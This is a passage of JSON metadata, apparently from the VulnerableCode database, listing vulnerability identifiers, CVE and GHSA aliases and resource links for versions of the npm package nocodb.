"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28361","GHSA-p9x3-w98f-7j3q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z9nq-zv94-syhg"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.10.1"}